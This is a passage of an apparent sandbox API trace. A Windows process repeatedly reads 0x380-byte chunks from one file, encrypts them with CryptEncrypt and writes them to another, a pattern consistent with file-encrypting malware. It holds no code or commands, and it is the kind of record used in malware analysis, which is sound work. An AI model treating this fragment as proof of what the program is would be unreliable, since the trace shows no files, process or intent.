lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.851] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.851] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.851] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.851] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.851] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.851] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.851] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.851] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.851] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.852] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.852] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.852] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.852] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.852] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.852] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.852] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.852] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.852] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.852] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.852] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.852] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.852] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.852] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.852] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.852] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.853] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.853] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.853] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.853] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.853] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.853] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.853] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.853] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.853] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.853] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.853] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.853] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.853] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.853] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.853] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.854] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.854] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.854] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.854] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.854] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.854] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.854] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.854] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.854] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.854] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.854] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.854] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.854] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.854] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.855] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.855] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.855] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.855] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.855] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.855] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.855] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.855] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.855] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.855] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.855] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.855] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.855] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.855] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.856] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.856] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.856] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.856] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.856] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.856] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.856] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.856] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.856] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.856] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.856] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.856] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.856] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.856] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.856] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.857] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.857] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.857] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.857] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.857] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.857] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.857] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.857] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.857] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.857] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.857] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.857] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.857] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.858] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.858] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.858] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.858] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.858] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.858] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.858] CryptEncrypt (in: hKey=0x2fb548, 